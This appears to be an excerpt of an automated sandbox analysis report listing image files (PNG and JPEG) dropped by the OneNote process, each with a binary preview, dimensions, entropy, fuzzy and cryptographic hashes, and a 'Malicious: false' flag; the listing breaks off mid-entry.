                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):55804
                                                                                                        Entropy (8bit):7.433623355028275
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                        MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                        SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                        SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                        SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3009
                                                                                                        Entropy (8bit):7.493528353751471
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                        MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                        SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                        SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                        SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22203
                                                                                                        Entropy (8bit):6.977175130747846
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                        MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                        SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                        SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                        SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
